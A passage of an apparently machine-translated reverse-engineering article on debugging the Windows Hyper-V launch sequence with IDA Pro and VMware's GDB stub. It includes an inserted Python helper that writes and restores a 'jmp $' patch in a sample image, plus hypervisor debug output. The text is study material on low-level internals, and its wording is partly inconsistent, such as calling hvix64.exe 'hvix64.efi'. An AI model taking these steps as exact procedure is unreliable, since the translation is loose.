<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Only BtPrepareHypervisorLaunch needs the pointers to VmxDetect and SvmDetect. These functions are called immediately after BtpIdentifyPlatform, depending on the platform (VmxDetect for Intel and SvmDetect for AMD):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="69" src="https://lh6.googleusercontent.com/XIHq9SYzrQm2xKIik85d67bj1Bte8Au2Wkk1YOgVYy1k59Nr3XHCu2r_Ji_ce0LPglBcRBF0m3lr83eX88VvDfBQB9nG6TZvvNdD-869x_Yxu1QT7q55zXJ6wnOlk6DnYlB3UqbxXNh3PA1z" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="368" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VmxDetect, for example, determines the capabilities of the processor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="200" src="https://lh6.googleusercontent.com/O7Zzt2TuvXDTcx25T1GJqJGtp2v27H4XV9OBibxa0mqB1sMTcm7FAwppKFaDZpApVvRq6rmmErPh-iHyTiuxzOVICGs0ae6zUYbgiMPH8PMT1fj_vPQYYFsgELNp0IQNzL0LujZhhAgG_50j" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="425" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="163" src="https://lh3.googleusercontent.com/2X-fP-HRQwGnu3wINNQneMZmvbX9n4NVO098CyeYcH19wmlXRMTqZsMWpfHv4nM53eofR4Lmb8snRbTojj4Qcge-HA5mWKjnAyZVQ5tztLBw7CAodxTGi1Cyhfq89eTkE7QKDO0Qjdk8Lhx1" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="524" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and returns a pointer to the next platform-specific function, VmxValidate (SvmDetect returns SvmValidate), and so on.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also worth noting is the calculation of a random offset from the hypervisor base address 0xFFFFF800`00000000 and the subsequent relocation of the image by the call to BtpLayoutHvImage.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BtPrepareHypervisorLaunch also calls BtpLayoutKdExtension, which loads kdstub.dll.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="147" src="https://lh4.googleusercontent.com/6JWL60xTIgzXM7uC82xeEd392qyQ4yuYayjNkkMW33WMmFwNQ_xh4wS0mCUoVp8icbPlzZoXNc7ag-WPqe4IZFOGD5Vf4xWN-HjVjbIgsxnDzcgFIG7FiKcuiU3CkAg9PirQfKbrZjYg3HFq" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="258" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function BtpAllocateAndBuildLoaderBlock fills in the loader block BtpLoaderBlockPages (HvlpLoaderBlock in winload), which is later used when control is transferred to the start procedure of hvix64.exe.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The rebase messages</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rebase Hv by: 6c25000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rebase Kdnet extension by: 7000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">show the load offsets of the hypervisor and of kdstub.dll relative to the address 0xFFFFF800`00000000. These offsets will be needed when we switch the IDA PRO debugging session from winload.exe to hvix64.exe.</span></div>
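<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The two manual steps described above, parking HvlMain (and later the hvix64.exe start procedure) in a jmp $ loop and turning the "Rebase ... by:" messages into runtime addresses, can be illustrated with a small standalone Python helper. This is an added example, not the article's PatchHvLoader.py / RestoreHvLoader.py; the sample image bytes, the HvlMain offset inside it and all function names are constructed for the illustration.</span></div>

```python
# Added example (not the article's PatchHvLoader.py / RestoreHvLoader.py):
# 1) park an entry point in a "jmp $" loop (EB FE 90) and restore it later,
# 2) turn the "Rebase ... by:" messages into runtime addresses.
# The image bytes, HVLMAIN_RVA and all function names are constructed here.
import re
import struct

HV_BASE = 0xFFFFF800_00000000          # hypervisor base address named in the article
HVLOADER_BASE = 0x4BA000               # load base of hvloader.efi (from the article)
PARK_PATCH = bytes.fromhex("EBFE90")   # jmp $ ; nop
HVLMAIN_RVA = 0x10                     # hypothetical offset of HvlMain in the sample image

# Constructed stand-in for the code at HvlMain: "mov rax, rcx ; ret".
SAMPLE_ENTRY_CODE = bytes.fromhex("488BC1C3")

# The two messages quoted in the article, used here as sample input.
REBASE_MESSAGES = """Rebase Hv by: 6c25000
Rebase Kdnet extension by: 7000
"""


def sample_image() -> bytearray:
    """Build a small constructed image containing the stand-in HvlMain code."""
    image = bytearray(0x20)
    image[HVLMAIN_RVA:HVLMAIN_RVA + len(SAMPLE_ENTRY_CODE)] = SAMPLE_ENTRY_CODE
    return image


def decode_jmp_rel8(code: bytes, address: int) -> int:
    """Return the target of a two-byte short jump (EB rel8) located at address."""
    if len(code) < 2 or code[0] != 0xEB:
        raise ValueError("not a short jmp")
    rel = struct.unpack("<b", bytes(code[1:2]))[0]
    return address + 2 + rel          # rel8 is relative to the next instruction


def park_entry(image: bytearray, rva: int) -> bytes:
    """Overwrite three bytes at rva with EB FE 90 and return the saved originals.

    Execution never gets past the jmp, so it does not matter whether the
    trailing NOP lands in the middle of an original instruction; the saved
    bytes are put back verbatim by restore_entry().
    """
    saved = bytes(image[rva:rva + len(PARK_PATCH)])
    if len(saved) != len(PARK_PATCH):
        raise ValueError("rva too close to the end of the image")
    image[rva:rva + len(PARK_PATCH)] = PARK_PATCH
    return saved


def restore_entry(image: bytearray, rva: int, saved: bytes) -> None:
    """Put the original bytes back; refuses to run if the patch is not there."""
    if bytes(image[rva:rva + len(PARK_PATCH)]) != PARK_PATCH:
        raise RuntimeError("park patch not present at rva")
    image[rva:rva + len(saved)] = saved


def parse_rebase_messages(text: str) -> dict:
    """Map 'Rebase <name> by: <hex>' lines to {name: offset}."""
    found = {}
    for m in re.finditer(r"Rebase (.+?) by: ([0-9A-Fa-f]+)", text):
        found[m.group(1)] = int(m.group(2), 16)
    return found


def rebased_address(base: int, rebase_by: int, rva: int) -> int:
    """Runtime address of an item at image offset rva after the loader's rebase."""
    return base + rebase_by + rva


if __name__ == "__main__":
    img = sample_image()
    entry_va = HVLOADER_BASE + HVLMAIN_RVA
    original = park_entry(img, HVLMAIN_RVA)
    # The patched jump must resolve to its own address, i.e. loop forever.
    assert decode_jmp_rel8(img[HVLMAIN_RVA:], entry_va) == entry_va
    restore_entry(img, HVLMAIN_RVA, original)
    offsets = parse_rebase_messages(REBASE_MESSAGES)
    print(f"hvix64 loaded at {rebased_address(HV_BASE, offsets['Hv'], 0):#x}")
```

The same park/restore pair applies to the jmp $ (EB FE) inserted at the start procedure of hvix64.exe; only the base and the offset change.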
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Back in winload.efi</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function HvlpTransferToHypervisor performs the transition to the start procedure of hvix64.exe.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="170" src="https://lh4.googleusercontent.com/w-xp8vDKWoIl9RaxhTeJMcljAd-8Vei-jtHaVL0Bd-QcKRNVd7IYL8Xf8zwQjMCy4MeeB1bGvgvIqzgPLuxgLHG8pkCiZCId-bfiOha9Bq3YhS1u2OAc0mcat9nLyC7xZRfhmek22kylheHm" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="264" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The instruction jmp r8 transfers execution to the code located at the address stored in HvlpBelow1MbPage (0x2000).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="39" src="https://lh3.googleusercontent.com/HROhJ81-O9Q7it_HWXewcKn6NKM3Ul_UGTxZzBPuLYfGUbVvwMTou5uhOx5xKIJYXtY10TSyhOLamELHrZLGneL8UyWTQm0pzJklcACtVBnyEOpeRpUEKfDi1qGRXqK0ytykkm4CPM3e5DNh" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="360" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a previous rdx the structure was placed by hvLoaderBlock (offset +18h) address to the start of hvix64.exe</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Later in IDA PRO you have to download hvix64.idb (similar to hvloader. efi), which works as follows:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">insert statement jmp $ (EB FE) at the start of the procedure start in hvix64. exe;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">completion debugging of winload.efi through the Debugger->the Detach from process; </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">file download hvix64.efi in IDA PRO;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">connection to the gdb debugger vmware;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">restore the changed bytes to the original;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">performing the operation Edit -> Segment -> Rebase program indicating an Image Base 0xFFFFF800 00000000 + value, which was issued by the debugger in the Rebase Hv by: 6c25000.</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next quite a number of different operations as to be done in preparation for the execution of vmxon instruction:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="74" src="https://lh3.googleusercontent.com/fDPALKcpWWFVuRmrCFcUUNoIMs2BLrViG4pCrcpQHg24QdTsLPDN0D55yN8uxVBpX66_UOoHOQvXM_tDPhgFecFF0u8c8BRi6_E5zOBc9W7ZCaiQ2RCUW4UlS_SICZ7fJWnEsj83WUFwVWH4" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="318" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then vmptrld, subsequent filling VMCS with necessary values and in the last instance it will start vmlaunch.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After vmlaunch gets into HvlpReturnFromHypervisor while debugging via GDB we will see that after the first instruction cpuid, calling VM exit, the transition is made directly to the HOST_RIP.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="231" src="https://lh6.googleusercontent.com/TjvZnMpRmimp-a8V1NJM8OjYGyRN2HURLyWHZsnqJ1lRQvhoeYqD94jUnWciygEdA8sb4rIE9HUhaLglyL00LKCGtxxUrTHMlSgcxFZFsfnV9i7132xvm5XWQYG1eZ5Q_tgk6M6RYXwNOKK7" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="345" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="280" src="https://lh5.googleusercontent.com/3EvTEyU3a4bWAhdEWa_dZOXj12XjuIQ7UJLJ4PazW-_2LGK4MFCwtde6AQ-ZNvOCj5SHE8whw7Yak0CExDQteSIAkQeXiZNeO_GGm6ibCNq7yX0uzqicarh3saFxLwJ2RRF6vVA2-_-XfAuE" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="274" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After returning from the procedure, HvlpReturnFromHypervisor passes control to the next instruction after HvlpTransferToHypervisor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="47" src="https://lh5.googleusercontent.com/wrVKd2eS66xqq3jXLKsO0Cdv9Vd3nW9xiDzeXP6CJJLTcNWFNGlhdGYQkGjzSDm07NxCqXGGbhGOoSYxD-PTLn7w1f1urCbVsI9ayzEcyisI6UalzUtgXzUN3tYyYXHdIXnK2Gznw8m08ado" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="493" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> at the end of the function HvlpLaunchHypervisor starts the kernel Windows through OslArchTransferToKernel.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="176" src="https://lh4.googleusercontent.com/Gf5I_9SVVDKVh8jvJ16iMSBNGzMhn8-LozrjlZxlHAR4-inFVwlyeL1S8l0-SKUKglYBo_0yK16St1FiIfBlicZDU7bccdxVBE2q94rHLZAagJDfEDt2xOqeO3bxOzAjh-iF81bVCbR9o658" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="526" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the Debugger is connected to the hypervisor, we can observe the following output (for the virtual system Windows Server 2012 checked build with two processors, each consists of two cores).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0] Hypervisor initialized.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MTRR map: number of ranges = 6 (default=UC)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000000000, Size=0x00000000000a0000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000a0000, Size=0x0000000000020000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000c0000, Size=0x000000000000c000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000cc000, Size=0x0000000000024000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000f0000, Size=0x0000000000010000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000100000, Size=0x00000000bff00000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[1] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[1] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[2] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[2] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[3] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[3] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MTRR map: number of ranges = 6 (default=UC)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000000000, Size=0x00000000000a0000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000a0000, Size=0x0000000000020000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000c0000, Size=0x000000000000c000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000cc000, Size=0x0000000000024000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
